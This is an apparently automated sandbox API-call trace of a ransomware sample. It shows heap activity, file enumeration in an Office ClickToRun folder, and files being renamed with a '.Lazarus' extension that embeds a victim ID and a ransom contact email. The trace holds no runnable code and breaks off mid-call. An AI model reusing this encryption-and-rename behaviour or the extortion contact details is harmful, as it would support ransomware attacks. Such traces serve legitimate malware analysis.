[0094.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0094.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0094.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0094.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0094.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0094.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0094.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0094.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8afe0 [0094.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0094.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a958 [0094.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a9f0 [0094.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0094.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0094.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0094.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0094.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0094.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0094.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0094.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0094.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0094.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0094.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0094.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0094.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0094.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aa88 [0094.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0094.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0094.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0094.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0094.095] AreFileApisANSI () returned 1 [0094.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a8c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 130 [0094.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x104) returned 0x8b680 [0094.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a8c0, cbMultiByte=-1, lpWideCharStr=0x8b680, cchWideChar=130 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 130 [0094.095] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b3e121, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b3e121, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x90a1e490, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x127260)) returned 1 [0094.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b680 | out: hHeap=0x20000) returned 1 [0094.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0094.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0094.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.096] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b64383, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b64383, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8ee04f00, ftLastWriteTime.dwHighDateTime=0x1d0d67f, nFileSizeHigh=0x0, nFileSizeLow=0x1028, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="C2RHeartbeatConfig.xml", cAlternateFileName="C2RHEA~1.XML")) returned 1 [0094.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0094.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0094.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0094.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0094.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0094.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0094.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0094.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0094.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0094.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0094.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0094.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0094.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0094.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0094.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0094.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0094.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0094.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0094.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0094.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0094.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81410 [0094.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0094.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81410 | out: hHeap=0x20000) returned 1 [0094.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0094.096] AreFileApisANSI () returned 1 [0094.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml", lpUsedDefaultChar=0x0) returned 81 [0094.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0094.097] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.097] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0094.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0094.097] AreFileApisANSI () returned 1 [0094.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0094.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5f798 [0094.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x5f798, cchWideChar=81 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 81 [0094.097] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0094.097] GetFileType (hFile=0x418) returned 0x1 [0094.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0094.097] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0094.097] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0094.098] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0094.098] CloseHandle (hObject=0x418) returned 1 [0094.098] AreFileApisANSI () returned 1 [0094.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0094.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5fe78 [0094.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x5fe78, cchWideChar=81 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 81 [0094.098] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0094.098] GetFileType (hFile=0x418) returned 0x1 [0094.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fe78 | out: hHeap=0x20000) returned 1 [0094.098] CloseHandle (hObject=0x418) returned 1 [0094.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0094.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0094.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0094.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0094.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0094.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0094.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0094.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0094.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0094.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0094.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0094.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0094.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0094.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0094.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0094.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0094.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0094.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0094.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0094.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0094.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0094.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0094.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0094.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0094.100] AreFileApisANSI () returned 1 [0094.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0094.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5f9a8 [0094.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x5f9a8, cchWideChar=81 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 81 [0094.100] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b64383, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b64383, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8ee04f00, ftLastWriteTime.dwHighDateTime=0x1d0d67f, nFileSizeHigh=0x0, nFileSizeLow=0x1028)) returned 1 [0094.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0094.100] AreFileApisANSI () returned 1 [0094.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0094.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0094.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0094.100] GetLastError () returned 0x0 [0094.100] SetLastError (dwErrCode=0x0) [0094.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e180 [0094.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x49ca0 [0094.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0094.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0094.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6f0 [0094.101] GetLastError () returned 0x0 [0094.101] SetLastError (dwErrCode=0x0) [0094.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0094.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0094.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8f) returned 0x8ace8 [0094.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0094.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0094.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0094.101] AreFileApisANSI () returned 1 [0094.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8ace8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 143 [0094.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x11e) returned 0x5e870 [0094.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8ace8, cbMultiByte=-1, lpWideCharStr=0x5e870, cchWideChar=143 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 143 [0094.101] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0094.101] GetFileType (hFile=0x418) returned 0x1 [0094.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0094.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0094.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0094.102] AreFileApisANSI () returned 1 [0094.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0094.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5f798 [0094.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x5f798, cchWideChar=81 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 81 [0094.102] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 